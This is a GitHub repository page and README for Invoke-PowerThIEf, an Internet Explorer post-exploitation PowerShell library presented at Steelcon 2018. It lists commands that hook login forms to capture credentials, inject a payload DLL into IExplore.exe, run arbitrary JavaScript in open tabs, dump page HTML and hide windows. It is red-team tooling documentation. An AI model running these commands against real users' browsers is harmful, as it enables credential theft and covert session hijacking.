Skip to content

nettitude/Invoke-PowerThIEf

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
2 branches 0 tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Images
Updating images
July 10, 2018 10:53
Invoke-PowerThIEf.ps1
Fixed issue where not all post parameter is shown in creds
July 18, 2018 20:23
LICENSE
Initial commit
July 10, 2018 10:14
README.md
Updated readme
July 10, 2018 11:33
Steelcon-2018-com-powerthief-final.pdf
Renamed slides
July 10, 2018 11:08
Invoke-PowerThIEf 2018 Nettitude Examples Capturing credentials entered via LastPass Migrating a PoshC2 implant into IExplore.exe Extracting a "secret" from a page Usage List all currently open browser windows/tabs List URLs for all current IE browser sessions, result will contain the BrowserIndex used by other actions Capturing credentials in transit Automatically scan any windows or tabs for login forms and then record what gets posted. A notification will appear when some have arrived. List any creds that have been captured. Have IExplore.exe load a DLL of your choosing (must be x64) Launch the DLL(x64) specified by the PathPayload param in IE's process Invoking JavaScript Invoke JavaScript in all currently opened IE windows and tabs Invoke JavaScript in the selected IE window or tab. Dumping HTML Dump HTML from all currently opened IE windows/tabs Dump HTML from the selected IE window or tab. Dump HTML from all tags of <type> in the DOM of the selected IE window or tab. Use ListUrls to get the BrowserIndex to identify the Window/Tab Dump HTML from any tag with the <id> found in the DOM of the selected IE window or tab. Use ListUrls to get the BrowserIndex to identify the Window/Tab Dump HTML from any tag with the <name> found in the DOM of the selected IE window or tab. Use ListUrls to get the BrowserIndex to identify the Window/Tab Showing/Hiding Windows Set to visible all IE windows/tabs Set the selected window/tab to be visible. Hide all currently opened IE windows/tabs Hide the selected window/tab. Use ListUrls to get the BrowserIndex to identify the Window/Tab Navigating the browser Navigate all currently opened IE windows/tabs to the <URL> Navigate all currently opened IE windows/tabs to the <URL>. Use ListUrls to get the BrowserIndex to identify the Window/Tab Navigate all currently opened IE windows/tabs to the <URL>. Use ListUrls to get the BrowserIndex to identify the Window/Tab Background tabs Open a new background tab in the window that the <BrowserIndex> is in. License

README.md

Invoke-PowerThIEf 2018 Nettitude

An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.

Written by Rob Maslen @rbmaslen

Examples

Capturing credentials entered via LastPass

Migrating a PoshC2 implant into IExplore.exe

Extracting a "secret" from a page

Usage

First import the module using . .\Invoke-PowerThIEf.ps1 then use any of the following commands.

List all currently open browser windows/tabs

List URLs for all current IE browser sessions, result will contain the BrowserIndex used by other actions

Invoke-PowerThIEf -action ListUrls

Capturing credentials in transit

Automatically scan any windows or tabs for login forms and then record what gets posted. A notification will appear when some have arrived.

Invoke-PowerThIEf -action HookLoginForms

List any creds that have been captured.

Invoke-PowerThIEf -action Creds

Have IExplore.exe load a DLL of your choosing (must be x64)

Launch the DLL(x64) specified by the PathPayload param in IE's process

Invoke-PowerThIEf -action ExecPayload -PathPayload <path to the payload DLL(x64)>

Invoking JavaScript

Invoke JavaScript in all currently opened IE windows and tabs

Invoke-PowerThIEf -action InvokeJS -Script <JavaScript to run>

Invoke-PowerThIEf -action InvokeJS -Script 'alert(document.location.href);'

Invoke JavaScript in the selected IE window or tab.

Invoke-PowerThIEf -action InvokeJS -BrowserIndex <BrowserIndex> -Script\<JavaScript to run>

Dumping HTML

Dump HTML from all currently opened IE windows/tabs

Invoke-PowerThIEf -action DumpHtml

Dump HTML from the selected IE window or tab.

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex>

Dump HTML from all tags of <type> in the DOM of the selected IE window or tab. Use ListUrls to get the BrowserIndex to identify the Window/Tab

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType tag -Selector <type>

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType tag -Selector div

Dump HTML from any tag with the <id> found in the DOM of the selected IE window or tab. Use ListUrls to get the BrowserIndex to identify the Window/Tab

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType id -Selector <id>

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType id -Selector idfirstdiv

Dump HTML from any tag with the <name> found in the DOM of the selected IE window or tab. Use ListUrls to get the BrowserIndex to identify the Window/Tab

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType name -Selector <name>

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType name -Selector namefirstdiv

Showing/Hiding Windows

Set to visible all IE windows/tabs

Invoke-PowerThIEf -action ShowWindow

Set the selected window/tab to be visible.

Invoke-PowerThIEf -action ShowWindow -BrowserIndex <BrowserIndex>

Hide all currently opened IE windows/tabs

Invoke-PowerThIEf -action HideWindow

Hide the selected window/tab. Use ListUrls to get the BrowserIndex to identify the Window/Tab

Invoke-PowerThIEf -action HideWindow -BrowserIndex <BrowserIndex>

Navigating the browser

Navigate all currently opened IE windows/tabs to the <URL>

Invoke-PowerThIEf -action Navigate -NavigateUrl <URL>

Navigate all currently opened IE windows/tabs to the <URL>. Use ListUrls to get the BrowserIndex to identify the Window/Tab

Invoke-PowerThIEf -action Navigate -BrowserIndex <BrowserIndex> -NavigateUrl <URL>

Navigate all currently opened IE windows/tabs to the <URL>. Use ListUrls to get the BrowserIndex to identify the Window/Tab

Invoke-PowerThIEf -action Navigate -BrowserIndex <BrowserIndex> -NavigateUrl <URL>

Background tabs

Open a new background tab in the window that the <BrowserIndex> is in.

Invoke-PowerThIEf -action NewBackgroundTab -BrowserIndex <BrowserIndex>

License

FreeBSD 3

About

The PowerThIEf, an Internet Explorer Post Exploitation library

Resources

Readme

License

BSD-3-Clause license
Activity

Stars

127 stars

Watchers

60 watching

Forks

27 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages